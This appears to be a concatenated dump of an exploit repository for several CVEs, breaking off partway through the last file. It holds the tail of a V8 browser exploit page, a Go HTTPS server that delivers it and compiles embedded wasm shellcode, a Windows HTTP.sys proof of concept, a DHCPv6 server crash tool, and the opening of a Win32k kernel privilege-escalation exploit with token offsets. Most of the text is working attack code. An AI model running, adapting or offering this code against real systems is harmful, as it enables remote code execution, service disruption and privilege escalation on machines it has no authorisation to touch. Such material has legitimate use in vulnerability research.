    }
    // Same mix: big-endian write, little-endian read.
    function f2big(f) {
        dv.setFloat64(0, f);
        return (dv.getBigUint64(0, true));
    }
    // Reverse mix: little-endian write, big-endian read.
    function big2f(b) {
        dv.setBigUint64(0, b, true);
        return dv.getFloat64(0);
    }
    function flow(f) {
        dv.setFloat64(0, f, true);
        return (dv.getUint32(0, true));
    }
    function fhi(f) {
        dv.setFloat64(0, f, true);
        return (dv.getUint32(4, true));
    }
    function i2f(low, hi) {
        dv.setUint32(0, low, true);
        dv.setUint32(4, hi, true);
        return dv.getFloat64(0, true);
    }
    function majorGc() {
        var arr_stack = [];
        for (let i = 0; i < 80; i++) {
            try {
                arr_stack.push(new ArrayBuffer(0x7ff00000000 + i));
            } catch (msg) {
                break;
            }
        }
    }
    function main() {
        var arr = [1.1, 1.1];
        function setInnerProperty(o, obj) {
            for (let m = 0; m < 0x100000; m++) {
                o.inner.foo = obj;
            }
        }
        // % PrepareFunctionForOptimization(setInnerProperty);
        // % OptimizeFunctionOnNextCall(setInnerProperty);
        function setaddr(str, addr, flag) {
            var o = {
                inner: {
                    ['foo']: 1.5
                }
            };
            eval(str);// eval prevents inlining
            if (flag) {
                console.log("fuckme");
                console.log(o.inner.foo)
            }
            o.inner.foo = addr;
            // return o.inner.foo;
            return arr;
        };
        % PrepareFunctionForOptimization(setaddr);
        // optimize setInnerProperty
        setaddr("setInnerProperty(o, arr,false);", xxx);
        majorGc();
        setaddr("setInnerProperty(o, arr,false);", xxx);
        majorGc();
        % OptimizeFunctionOnNextCall(setaddr);
        // % DebugPrint(arr);
        //
        let o = setaddr("setInnerProperty(o, arr,true);", xxx);
        %DebugPrint("fuck");
        % DebugPrint(o);
        alert("go to change length");
        o[0]=i2f(flow(o[0]),0x40);
        alert("check Length");
    }
    main();
};
exp();
</script>
================================================
FILE: CVE-2022-3723/go.mod
================================================
module httpsServer
go 1.20
require github.com/bytecodealliance/wasmtime-go/v8 v8.0.0
================================================
FILE: CVE-2022-3723/go.sum
================================================
github.com/bytecodealliance/wasmtime-go/v8 v8.0.0 h1:jP4sqm2PHgm3+eQ50zCoCdIyQFkIL/Rtkw6TT8OYPFI=
github.com/bytecodealliance/wasmtime-go/v8 v8.0.0/go.mod h1:tgazNLU7xSC2gfRAM8L4WyE+dgs5yp9FF5/tGebEQyM=
github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
github.com/niemeyer/pretty v0.0.0-20200227124842-a10e7caefd8e h1:fD57ERR4JtEqsWbfPhv4DMiApHyliiK5xCTNVSPiaAs=
github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
github.com/stretchr/testify v1.8.0 h1:pSgiaMZlXftHpm5L7V1+rVB+AZJydKsMxsQBIJw4PKk=
gopkg.in/check.v1 v1.0.0-20200902074654-038fdea0a05b h1:QRR6H1YWRnHb4Y/HeNFCTJLFVxaq6wH4YuVdsUOr75U=
gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
================================================
FILE: CVE-2022-3723/mainHttps.go
================================================
package main
import (
"errors"
"flag"
"fmt"
"github.com/bytecodealliance/wasmtime-go/v8"
"io/ioutil"
"log"
"math"
"net/http"
"os"
"path"
"path/filepath"
"regexp"
"strconv"
"strings"
)
// Last value received through the hex-named request in fileServerHandler.
// -1 is the "nothing received yet" sentinel: exp.html is served as a reload
// page while it is -1, and it is reset to -1 after being substituted.
var globalFloat float64 = -1
var wasm_code = `
(module
(func $f (export "f") (param i64)
(call $f (i64.const 0x12EB9060B0C03148)) ;; 48 31 C0 B0 60 90 EB 12 12EB9060B0C03148
(call $f (i64.const 0x0BEB9090008B4865)) ;; 65 48 8B 00 90 90 EB 0B 0BEB9090008B4865
(call $f (i64.const 0x0BEB909018408B48)) ;; 48 8B 40 18 90 90 EB 0B 0BEB909018408B48
(call $f (i64.const 0x0BEB909030408B48)) ;; 48 8B 40 30 90 90 EB 0B 0BEB909030408B48
(call $f (i64.const 0x0BEBc08b48C08548)) ;; 48 85 C0 48 8b c0 EB 0B 0BEBc08b48C08548
(call $f (i64.const 0x0BEB000002D1840F)) ;; 0F 84 D1 02 00 00 EB 0B 0BEB000002D1840F
(call $f (i64.const 0x0BEB9000320033BA)) ;; BA 33 00 32 00 90 EB 0B 0BEB9000320033BA
(call $f (i64.const 0x0BEB909020E2C148)) ;; 48 C1 E2 20 90 90 EB 0B 0BEB909020E2C148
(call $f (i64.const 0x0BEB90004C0045B9)) ;; B9 45 00 4C 00 90 EB 0B 0BEB90004C0045B9
(call $f (i64.const 0x0BEBdb8b48CA0148)) ;; 48 01 CA 48 8b db EB 0B 0BEBdb8b48CA0148
(call $f (i64.const 0x0BEB004E0052B941)) ;; 41 B9 52 00 4E 00 EB 0B 0BEB004E0052B941
(call $f (i64.const 0x0BEB909020E1C149)) ;; 49 C1 E1 20 90 90 EB 0B 0BEB909020E1C149
(call $f (i64.const 0x0BEB900045004BB9)) ;; B9 4B 00 45 00 90 EB 0B 0BEB900045004BB9
(call $f (i64.const 0x0BEBc98b48C90149)) ;; 49 01 C9 48 8b c9 EB 0B 0BEBc98b48C90149
(call $f (i64.const 0x0BEB004C004CB841)) ;; 41 B8 4C 00 4C 00 EB 0B 0BEB004C004CB841
(call $f (i64.const 0x0BEB909020E0C149)) ;; 49 C1 E0 20 90 90 EB 0B 0BEB909020E0C149
(call $f (i64.const 0x0BEB900044002EB9)) ;; B9 2E 00 44 00 90 EB 0B 0BEB900044002EB9
(call $f (i64.const 0x0BEBf68b48C80149)) ;; 49 01 C8 48 8b f6 EB 0B 0BEBf68b48C80149
(call $f (i64.const 0x0BEB909040488B48)) ;; 48 8B 48 40 90 90 EB 0B 0BEB909040488B48
(call $f (i64.const 0x0BEB904774C98548)) ;; 48 85 C9 74 47 90 EB 0B 0BEB904774C98548
(call $f (i64.const 0x0BEB90347509394C)) ;; 4C 39 09 75 34 90 EB 0B 0BEB90347509394C
(call $f (i64.const 0x0BEB207508513948)) ;; 48 39 51 08 75 20 EB 0B 0BEB207508513948
(call $f (i64.const 0x0BEB22741041394C)) ;; 4C 39 41 10 74 22 EB 0B 0BEB22741041394C
(call $f (i64.const 0x0BEBC08548008B48)) ;; 48 8B 00 48 85 C0 EB 0B 0BEBC08548008B48
(call $f (i64.const 0x0BEB10488B488C75)) ;; 75 8C 48 8B 48 10 EB 0B 0BEB10488B488C75
(call $f (i64.const 0x0BEB90903C416348)) ;; 48 63 41 3C 90 90 EB 0B 0BEB90903C416348
(call $f (i64.const 0x0BEBC80148C98949)) ;; 49 89 C9 48 01 C8 EB 0B 0BEBC80148C98949
(call $f (i64.const 0x0BEB000000880548)) ;; 48 05 88 00 00 00 EB 0B 0BEB000000880548
(call $f (i64.const 0x0BEB9090C031108B)) ;; 8B 10 31 C0 90 90 EB 0B 0BEB9090C031108B
(call $f (i64.const 0x0BEBff8b48CA0148)) ;; 48 01 CA 48 8b ff EB 0B 0BEBff8b48CA0148
(call $f (i64.const 0x0BEB909018528B44)) ;; 44 8B 52 18 90 90 EB 0B 0BEB909018528B44
(call $f (i64.const 0x0BEB909020428B44)) ;; 44 8B 42 20 90 90 EB 0B 0BEB909020428B44
(call $f (i64.const 0x0BEB9090245A8B44)) ;; 44 8B 5A 24 90 90 EB 0B 0BEB9090245A8B44
(call $f (i64.const 0x0BEB1c528bC80149)) ;; 49 01 C8 8b 52 1c EB 0B 0BEB1c528bC80149
(call $f (i64.const 0x0BEBCA0148CB0149)) ;; 49 01 CB 48 01 CA EB 0B 0BEBCA0148CB0149
(call $f (i64.const 0x0BEBc98b4dD28545)) ;; 45 85 D2 4d 8b c9 EB 0B 0BEBc98b4dD28545
(call $f (i64.const 0x0BEB00000092840F)) ;; 0F 84 92 00 00 00 EB 0B 0BEB00000092840F
(call $f (i64.const 0x0BEB90506C6175BB)) ;; BB 75 61 6C 50 90 EB 0B 0BEB90506C6175BB
(call $f (i64.const 0x0BEB909020E3C148)) ;; 48 C1 E3 20 90 90 EB 0B 0BEB909020E3C148
(call $f (i64.const 0x0BEB9074726956BE)) ;; BE 56 69 72 74 90 EB 0B 0BEB9074726956BE
(call $f (i64.const 0x0BEB088B41F30148)) ;; 48 01 F3 41 8B 08 EB 0B 0BEB088B41F30148
(call $f (i64.const 0x0BEB4674091C394A)) ;; 4A 39 1C 09 74 46 EB 0B 0BEB4674091C394A
(call $f (i64.const 0x0BEB04C08349C0FF)) ;; FF C0 49 83 C0 04 EB 0B 0BEB04C08349C0FF
(call $f (i64.const 0x0BEB90C572D03944)) ;; 44 39 D0 72 C5 90 EB 0B 0BEB90C572D03944
(call $f (i64.const 0x0BEBd28b4dC3C031)) ;; 31 C0 C3 4d 8b d2 EB 0B 0BEBd28b4dC3C031
(call $f (i64.const 0x0BEB904304B70F41)) ;; 41 0F B7 04 43 90 EB 0B 0BEB904304B70F41
(call $f (i64.const 0x0BEB9008245C8B48)) ;; 48 8B 5C 24 08 90 EB 0B 0BEB9008245C8B48
(call $f (i64.const 0x0BEBC8014C82048B)) ;; 8B 04 82 4C 01 C8 EB 0B 0BEBC8014C82048B
(call $f (i64.const 0x0BEB909090C68948)) ;; 48 89 C6 90 90 90 EB 0B 0BEB909090C68948
(call $f (i64.const 0x0BEB9000002000BA)) ;; BA 00 20 00 00 90 EB 0B 0BEB9000002000BA
(call $f (i64.const 0x0BEB00000040B841)) ;; 41 B8 40 00 00 00 EB 0B 0BEB00000040B841
(call $f (i64.const 0x0BEB90AABBCCDDB8)) ;; B8 DD CC BB AA 90 EB 0B 0BEB90AABBCCDDB8
(call $f (i64.const 0x0BEB909050F0014C)) ;; 4C 01 F0 50 50 90 EB 0B 0BEB909050F0014C
(call $f (i64.const 0x0BEB909090C18948)) ;; 48 89 C1 90 90 90 EB 0B 0BEB909090C18948
(call $f (i64.const 0x0BEB000019000548)) ;; 48 05 00 19 00 00 EB 0B 0BEB000019000548
(call $f (i64.const 0x0BEB90E6FFC18949)) ;; 49 89 C1 FF E6 90 EB 0B 0BEB90E6FFC18949
))
`
// faviconHandler serves ./favicon.ico from the working directory for the
// explicit /favicon.ico route registered in main.
func faviconHandler(w http.ResponseWriter, r *http.Request) {
	http.ServeFile(w, r, "favicon.ico")
}
// check panics with e when it is non-nil and is a no-op otherwise; used after
// the wasm write in fileServerHandler where there is no better recovery path.
func check(e error) {
	if e == nil {
		return
	}
	panic(e)
}
// isValidAddress reports whether str is one to eight hexadecimal digits (either
// case) and nothing else. The pattern is a constant, so MustCompile cannot panic.
func isValidAddress(str string) bool {
	hexAddr := regexp.MustCompile("^[0-9a-fA-F]{1,8}$")
	return hexAddr.MatchString(str)
}
// processShellcodeAddr validates str with isValidAddress and, on success,
// substitutes it into the first occurrence of the 0x0BEB90AABBCCDDB8 placeholder
// in code, returning the patched text. An invalid str is reported on stdout and
// returned as an error together with an empty string.
func processShellcodeAddr(str string, code string) (string, error) {
	if !isValidAddress(str) {
		fmt.Println("ShellcodeAddr地址无效")
		return "", errors.New("ShellcodeAddr地址无效")
	}
	code = strings.Replace(code, "0x0BEB90AABBCCDDB8", "0x0BEB90"+str+"B8", 1)
	return code, nil
}
// fileServerHandler serves everything under "/" relative to the working
// directory and special-cases three request shapes:
//   - last path element made only of lowercase hex digits: parsed as int64,
//     the high 32 bits are reduced by 0x10 (floored at 0), the bits are
//     reinterpreted as a float64 into globalFloat, and an empty 200 is sent;
//   - "exp.html": while globalFloat is still -1 a self-reloading page is
//     returned; otherwise the file is read, every "xxx" is replaced with the
//     float's text, and globalFloat is reset to -1;
//   - ".wasm" extension: the base name is substituted into wasm_code via
//     processShellcodeAddr, compiled with wasmtime.Wat2Wasm and written with
//     Content-Type application/wasm (the process exits on a compile error).
// Everything else goes to http.ServeFile.
// Review notes: globalFloat is shared mutable state read and written by
// concurrent handler goroutines without synchronization (a data race);
// fmt.Printf(baseName) passes request-derived text as the format string;
// ioutil is deprecated since Go 1.16 (go.mod targets 1.20; os.ReadFile);
// the -d flag from main is never consulted here.
func fileServerHandler(w http.ResponseWriter, r *http.Request) {
	fmt.Println(r.URL.Path)
	p := "." + r.URL.Path
	extName := path.Ext(r.URL.Path)
	// last element of the path
	base := path.Base(r.URL.Path)
	// check whether it consists only of 0-9 or a-f
	match, _ := regexp.MatchString("^[0-9a-f]+$", base)
	if match {
		fmt.Println("Matched string:", base)
		// parse the hex string as an integer
		i, err := strconv.ParseInt(base, 16, 64)
		if err != nil {
			log.Println("Error parsing hex string:", err)
			http.ServeFile(w, r, p)
			return
		}
		// take the high 4 bytes of i and subtract 0x10
		high4Bytes := int64(uint64(i)>>32) - 0x10
		// make sure the subtraction does not go negative
		if high4Bytes < 0 {
			high4Bytes = 0
		}
		// replace the high 4 bytes of i with the new value
		i = (high4Bytes << 32) | (i & 0xFFFFFFFF)
		// reinterpret the integer bits as a float
		globalFloat = math.Float64frombits(uint64(i))
		// print the float
		fmt.Println("Float: ", globalFloat)
		// Send an empty response
		w.WriteHeader(http.StatusOK)
		return
	}
	if base == "exp.html" {
		if globalFloat == -1 {
			fmt.Fprint(w, `
<!DOCTYPE html>
<html>
<head>
<title>Refresh Page</title>
</head>
<body>
<script>setTimeout(function(){ location.reload(); }, 1000);</script>
<p>Loading...</p>
</body>
</html>
`)
			return
		}
		content, err := ioutil.ReadFile(p)
		if err != nil {
			http.Error(w, err.Error(), http.StatusInternalServerError)
			return
		}
		newContent := strings.Replace(string(content), "xxx", fmt.Sprint(globalFloat), -1)
		fmt.Println("New content: ", newContent)
		fmt.Fprint(w, newContent)
		globalFloat = -1
		return
	}
	// fmt.Println(extName)
	if extName == ".wasm" {
		// strip the extension
		nameWithoutExt := strings.TrimSuffix(r.URL.Path, filepath.Ext(r.URL.Path))
		// strip the leading "/"
		baseName := filepath.Base(nameWithoutExt)
		fmt.Printf(baseName)
		wasmCodeOk, err := processShellcodeAddr(baseName, wasm_code)
		if err != nil {
			fmt.Println("发生错误:", err)
			panic("处理ShellcodeAddr发生错误")
		}
		fmt.Println(wasmCodeOk)
		wasm, err := wasmtime.Wat2Wasm(wasmCodeOk)
		if err != nil {
			fmt.Printf("error converting wat to wasm: %v\n", err)
			os.Exit(1)
		}
		fmt.Printf("编译结束")
		w.Header().Set("Content-Type", "application/wasm")
		_, err = w.Write([]byte(wasm))
		check(err)
		// Unchecked type assertion; net/http's ResponseWriter does implement Flusher.
		w.(http.Flusher).Flush()
		fmt.Printf("flushOK")
		return
	}
	http.ServeFile(w, r, p)
}
// main parses -p and -d, registers the two handlers on the default mux and
// serves TLS with server.pem / key.pem from the working directory.
// Review notes: both flags are only printed. ListenAndServeTLS is bound to the
// literal ":443" regardless of -p, and -d never affects which directory is
// served (the handlers resolve "." + URL path).
func main() {
	port := flag.String("p", "443", "port to serve on")
	directory := flag.String("d", ".", "the directory of static file to host")
	flag.Parse()
	fmt.Printf("path %s\n", *directory)
	http.HandleFunc("/favicon.ico", faviconHandler)
	http.HandleFunc("/", fileServerHandler)
	log.Printf("Begin Serving %s on HTTP port: %s\n", *directory, *port)
	log.Fatal(http.ListenAndServeTLS(":443", "server.pem", "key.pem", nil))
}
================================================
FILE: CVE-2023-23410/CVE-2023-23410_poc.c
================================================
#define SECURITY_WIN32
#include <http.h>
#include <sspi.h>
#include <strsafe.h>
#pragma warning(disable:4127) // condition expression is constant
/*
 * Entry point: initializes the HTTP.sys server API, creates a server session
 * and a URL group, then calls HttpSetUrlGroupProperty followed by
 * HttpQueryUrlGroupProperty with HttpServerChannelBindProperty, passing
 * hand-built ULONGLONG arrays in place of the documented HTTP_CHANNEL_BIND_INFO
 * layout. The return codes of those two calls are not checked and no
 * HttpCloseUrlGroup / HttpCloseServerSession / HttpTerminate cleanup runs.
 * Review notes: `return;` without a value is used twice in this int-returning
 * function; the outer `int i` is shadowed by the for loop's `i`; HeapAlloc's
 * result is used without a NULL check; pointers are stored into ULONGLONG
 * slots without a cast; hReqQueue, BindingProperty, CGTimeout, argc and argv
 * are unused.
 */
int
__cdecl
wmain(
    int argc,
    __in_ecount(argc) wchar_t* argv[]
)
{
    int i;
    HANDLE hReqQueue = NULL;
    HTTPAPI_VERSION HttpApiVersion = HTTPAPI_VERSION_2;
    HTTP_SERVER_SESSION_ID ssID = HTTP_NULL_ID;
    HTTP_BINDING_INFO BindingProperty;
    HTTP_TIMEOUT_LIMIT_INFO CGTimeout;
    ULONG retCode;
    HTTP_URL_GROUP_ID urlGroupId = HTTP_NULL_ID;
    //
    // Initialize HTTP APIs.
    //
    retCode = HttpInitialize(
        HttpApiVersion,
        HTTP_INITIALIZE_SERVER, // Flags
        NULL // Reserved
    );
    if (retCode != NO_ERROR)
    {
        wprintf(L"HttpInitialize failed with %lu \n", retCode);
        return retCode;
    }
    //
    // Create a server session handle
    //
    retCode = HttpCreateServerSession(HttpApiVersion,
        &ssID,
        0);
    if (retCode != NO_ERROR)
    {
        wprintf(L"HttpCreateServerSession failed with %lu \n", retCode);
        return; // NOTE(review): no value returned from an int function
    }
    //
    // Create UrlGroup handle
    //
    retCode = HttpCreateUrlGroup(ssID,
        &urlGroupId,
        0);
    if (retCode != NO_ERROR)
    {
        wprintf(L"HttpCreateUrlGroup failed with %lu \n", retCode);
        return; // NOTE(review): no value returned from an int function
    }
    ULONGLONG data1[4] = { 0 };
    ULONGLONG data3[0x21] = { 0 };
    ULONGLONG data[0x1000] = { 0 };
    BYTE data_temp1[0x1000] = { 0 };
    DWORD return_len = 0;
    WCHAR* str = HeapAlloc(GetProcessHeap(), 0, 0xfffffe0); // ~256 MiB; result not NULL-checked
    WCHAR str_test[0xfffe] = L"192.168.205.155:8081"; // 128 KiB stack array; only 0x20 bytes are copied
    memcpy(str, str_test, 0x20);
    data1[0] = 0x01;
    data1[1] = str; // pointer stored into a ULONGLONG slot without a cast
    data1[2] = 0xfffffe0-0xf0f0f0;
    for (int i = 0; i < 0x11; i++) // shadows the outer `i`
    {
        data3[i] = data1; // every slot points at the same data1 array
    }
    data[5] = 0x20;
    data[3] = 0x0c;
    data[2] = 0x11;
    data[0] = 0x1;
    data[1] = data3;
    // Both return codes are assigned and then ignored.
    retCode = HttpSetUrlGroupProperty(urlGroupId, HttpServerChannelBindProperty,&data,0x20);
    retCode = HttpQueryUrlGroupProperty(urlGroupId,HttpServerChannelBindProperty,&data_temp1,0x140, &return_len);
}
================================================
FILE: CVE-2023-28231/CVE-2023-28231-DHCP-VUL-PoC.cpp
================================================
#include <winsock2.h>
#include <ws2tcpip.h>
#include <iostream>
#pragma comment(lib, "Ws2_32.lib")
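// CVE-2023-28231 (Windows DHCPv6 server) proof of concept.
//
// Builds one DHCPv6 RELAY-FORW message (msg-type 0x0c, hop count 0x20) whose
// payload is 0x20 nested RELAY-FORW messages, each wrapped in an
// OPTION_RELAY_MSG (option code 9) whose length covers everything nested
// below it; the hop-count byte decreases from 0x1f to 0 towards the innermost
// message, which ends with the 0x18-byte `par2` tail (an option 9 of length
// 0x14 wrapping a msg-type-1 message, then options 2 and 1 of length 4 each).
// The datagram is sent 16 times to ff02::1:2 port 547
// (All_DHCP_Relay_Agents_and_Servers).
//
// Returns 0 after sending, 1 on any Winsock failure. Nothing is read back:
// the vulnerable parsing is server-side, and the intent is to crash it, so
// use only against a server you are authorised to test on an isolated link.
//
// Fixes vs the original: the InetPton result is checked, every sendto() is
// checked (previously only the last of 16 was), the stale GetLastError()
// local was dropped, and the "broadcast" comments were corrected (this is
// link-local multicast).
int main() {
    // Reference layout of a hand-written 3-level variant. Not sent; kept
    // because its inline "0x3a+0x26*n" notes document the length rule the
    // loop below reproduces.
    char data[] =
        "\x0c\x03\xa4\xf2\x00\x08\x00\x02\x00\x00\x00\x01\x00\x0e\x00\x01"
        "\x00\x01\x2b\x07\x5b\xc1\x00\x0c\x29\xe8\x6b\x79\x00\x03\x00\x0c"
        "\x07\x00"
        "\x00\x09\x00\x86\x0c\x02"//0x3a+0x26*2
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x09\x00\x60\x0c\x02"//0x3a+0x26
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x09\x00\x3a\x0c\x01"
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x09\x00\x14\x01\x07\x00\x00"
        "\x00\x02\x00\x04\x01\x07\x00\x00"
        "\x00\x01\x00\x04\x01\x07\x00\x00"
        ;
    (void)data;

    // One nesting level (0x26 bytes): option header [code 9][len, patched
    // per level] followed by a 34-byte RELAY-FORW header [type 0x0c]
    // [hop count, patched per level][link-address][peer-address].
    char par1[] =
        "\x00\x09\x0a\x9b\x0c\x01"
        "\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
    // Innermost tail (0x18 bytes).
    char par2[] =
        "\x00\x09\x00\x14\x01\x07\x00\x00"
        "\x00\x02\x00\x04\x01\x07\x00\x00"
        "\x00\x01\x00\x04\x01\x07\x00\x00"
        ;
    // Outgoing datagram: 34-byte outer RELAY-FORW header (hop count 0x20),
    // then num+1 copies of par1, then par2.
    char data1[0x1000] =
        "\x0c\x20\xa4\xf2\x00\x08\x00\x02\x00\x00\x00\x01\x00\x0e\x00\x01"
        "\x00\x01\x2b\x07\x5b\xc1\x00\x0c\x29\xe8\x6b\x79\x00\x03\x00\x0c"
        "\x07\x00"
        ;

    const int num = 0x1f;                              // highest hop count; num+1 levels
    const int total_len = 0x14 + 0x26 * (num + 1);     // option length of the outermost level
    for (int i = 0; i <= num; i++)
    {
        par1[5] = static_cast<char>(num - i);          // hop count: 0x1f ... 0
        // Each level's option length shrinks by one level (0x26 bytes).
        const u_short option_len = htons(static_cast<u_short>(total_len - i * 0x26));
        memcpy(par1 + 2, &option_len, 2);
        memcpy(data1 + 0x22 + 0x26 * i, par1, 0x26);
    }
    memcpy(data1 + 0x22 + 0x26 * (num + 1), par2, 0x18);
    const int send_len = 0x26 * (num + 1) + 0x22 + 0x18;

    // Initialise Winsock.
    WSADATA wsaData;
    const int result = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (result != 0) {
        std::cerr << "WSAStartup failed with error: " << result << std::endl;
        return 1;
    }
    // Create the socket.
    SOCKET sock = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
    if (sock == INVALID_SOCKET) {
        std::cerr << "Failed to create socket: " << WSAGetLastError() << std::endl;
        WSACleanup();
        return 1;
    }
    // Loop outgoing multicast back to this host as well, so a server running
    // on the sending machine also receives the datagram.
    int optVal = 1;
    if (setsockopt(sock, IPPROTO_IPV6, IPV6_MULTICAST_LOOP, (char*)&optVal, sizeof(optVal)) == SOCKET_ERROR) {
        std::cerr << "Failed to set socket option: " << WSAGetLastError() << std::endl;
        closesocket(sock);
        WSACleanup();
        return 1;
    }
    // Destination: the DHCPv6 relay/server multicast group, UDP 547.
    // sin6_scope_id is left 0, so the stack chooses the outgoing interface;
    // set IPV6_MULTICAST_IF if the target sits on a specific link.
    sockaddr_in6 destAddr = { 0 };
    destAddr.sin6_family = AF_INET6;
    destAddr.sin6_port = htons(547);
    if (InetPtonW(AF_INET6, L"ff02::1:2", &destAddr.sin6_addr) != 1) {
        std::cerr << "InetPton failed: " << WSAGetLastError() << std::endl;
        closesocket(sock);
        WSACleanup();
        return 1;
    }
    // Send the datagram 16 times; stop at the first failure.
    for (int i = 0; i < 0x10; i++)
    {
        if (sendto(sock, data1, send_len, 0, (sockaddr*)&destAddr, sizeof(destAddr)) == SOCKET_ERROR) {
            std::cerr << "Failed to send data: " << WSAGetLastError() << std::endl;
            closesocket(sock);
            WSACleanup();
            return 1;
        }
    }
    std::cout << "DHCPv6 Broadcast message sent!" << std::endl;
    // Clean up.
    closesocket(sock);
    WSACleanup();
    return 0;
}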
================================================
FILE: CVE-2023-29336/poc.cpp
================================================
// writeup link: https://www.numencyber.com/cve-2023-29336-win32k-analysis/
#include <windows.h>
//windows server 2016 Datacenter update patch in May
#include <stdio.h>
#include <tchar.h>
#define IDM_MYMENU 101
#define IDM_EXIT 102
#define IDM_DISABLE 0xf120
#define IDM_ENABLE 104
#define EPROCESS_UNIQUE_PROCESS_ID_OFFSET 0x440
#define EPROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x448
#define EPROCESS_TOKEN_OFFSET 0x4b8
typedef DWORD64(NTAPI* NtUserEnableMenuItem)(HMENU hMenu, UINT uIDEnableItem, UINT uEnable);
typedef DWORD64(NTAPI* NtUserSetClassLongPtr)(HWND a1, unsigned int a2, unsigned __int64 a3, unsigned int a4);
typedef DWORD64(NTAPI* NtUserCreateAcceleratorTable)(void* Src, int a2);
typedef DWORD64(NTAPI* fnNtUserConsoleControl)(int nConsoleCommand, PVOID, int nConsoleInformationLength);
NtUserSetClassLongPtr g_NtUserSetClassLongPtr = NULL;
NtUserEnableMenuItem g_NtUserEnableMenuItem = NULL;
NtUserCreateAcceleratorTable g_NtUserCreateAcceleratorTable = NULL;
fnNtUserConsoleControl g_pfnNtUserConsoleControl = nullptr;
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam);
int syytem();
// Header for the RWX region buildmem() reserves at 0x300000. Only the region's
// base address (pvShellCode) is used in this file; none of these fields are
// read or written by the code shown here.
typedef struct _SHELLCODE {
DWORD reserved;
DWORD pid;
DWORD off_THREADINFO_ppi;
DWORD off_EPROCESS_ActiveLink;
DWORD off_EPROCESS_Token;
BOOL bExploited;
BYTE pfnWindProc[];
} SHELLCODE, * PSHELLCODE;
// User-mode stand-in for win32k's tagMENU. Only the fields this PoC touches are
// named; offsets follow from declaration order with 8-byte alignment:
//   +0x28 obj28   - pointed at 0x302200; buildmem() writes 1 at obj28+0x2c
//                   (presumably the item count win32k consults - confirm)
//   +0x34 flag1, +0x38 flag2, +0x3c cxMenu, +0x40 cyMenu - all set to 1
//   +0x50 rgItems - item-array pointer; Read64() repoints it per read
//   +0x98 ref     - pointed at 0x302300, which in turn points back at the menu
// Everything else is padding named by offset.
struct tagMENU
{
ULONG64 field_0;
ULONG64 field_8;
ULONG64 field_10;
ULONG64 field_18;
ULONG64 field_20;
PVOID obj28;
DWORD field_30;
DWORD flag1;
DWORD flag2;
DWORD cxMenu;
DWORD cyMenu;
ULONG64 field_48;
PVOID rgItems;
ULONG64 field_58; // + 0x58
ULONG64 field_60;
ULONG64 field_68;
ULONG64 field_70;
ULONG64 field_78;
ULONG64 field_80;
ULONG64 field_88;
ULONG64 field_90;
PVOID ref; // + 0x98
};
// 0x96-byte opaque blob. Declared but never used in this file.
struct MyData
{
BYTE name[0x96];
};
// Exploit state shared between buildmem(), exploit(), Read64() and WinMain().
// All fixed addresses (0x30xxxx) live inside the 0x10000-byte RWX region
// buildmem() allocates at 0x300000.
tagMENU* g_pFakeMenu = 0;             // fake menu object at 0x302000
static PSHELLCODE pvShellCode = NULL; // base of the RWX region
HMENU hSystemMenu;                    // system menu of the trigger window
HMENU hMenu;                          // unused
HMENU hSubMenu;                       // popup menu destroyed from WndProc while win32k still uses it
HMENU hAddedSubMenu;                  // unused
HMENU hMenuB;                         // intermediate menu that carries hSubMenu into the system menu
PVOID MENU_add = 0;                   // GetMenuHandle(hSubMenu): mapped object of the popup
DWORD flag = 0;                       // set to 1 just before the trigger; gates WndProc
UINT iWindowCount = 0x100;            // unused
HWND HWND_list[0x300];                // 0x100 "NormalClass" spray windows
HWND HWND_list1[0x20];                // createclass() windows, slots 9..28 only
HMENU HMENUL_list[0x300];             // 0x200 menus, one attached to each spray window
int Hwnd_num = 0;                     // HWND_list1 index whose SetClassLongPtr(0x270) returned non-zero
int Hwnd_num1 = 0;                    // unused
ULONGLONG HWND_add = 0;               // mapped tagWND address of HWND_list[max]; 0 if the search failed
ULONGLONG GS_off = 0;                 // QWORD at TEB+0x800+0x28, subtracted from kernel heap addresses
WORD max = 0;                         // index of the middle window of the three adjacent ones found
static PULONGLONG ptagWNDFake = NULL; // fake structures at 0x304140 / 0x305300 / 0x306500
static PULONGLONG ptagWNDFake1 = NULL;
static PULONGLONG ptagWNDFake2 = NULL;
static PULONGLONG GS_hanlde = NULL;   // TEB+0x800 viewed as a QWORD array
static PULONGLONG HWND_class = NULL;  // 0x303000: fake class-extra block used for the token write
// Declared but never used in this file (no threads are created here).
struct ThreadParams {
int threadId;
int numLoops;
};
// Identity helper: hands back the value it receives, unchanged.
// Not referenced anywhere else in this file.
static unsigned long long GetGsValue(unsigned long long gsValue)
{
    const unsigned long long passthrough = gsValue;
    return passthrough;
}
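// Resolves a USER handle to the user-mode mapped copy of its kernel object
// and returns the QWORD at +0x20 of that copy.
//
// The handle table is read from USER32.DLL at the fixed RVA 0xbd688
// (presumably the shared handle table for the single build this PoC targets,
// "windows server 2016 Datacenter" per the file header; any other build reads
// garbage). Each entry is 0x18 bytes and entry[(WORD)menu_D] starts with the
// kernel address of the object; subtracting GS_off (set in WinMain from the
// TEB) rebases it into the read-only user-mode view of the desktop heap.
//
// Returns NULL if user32 is not loaded or the table pointer is zero. No other
// validation is possible here: a wrong RVA dereferences arbitrary memory.
//
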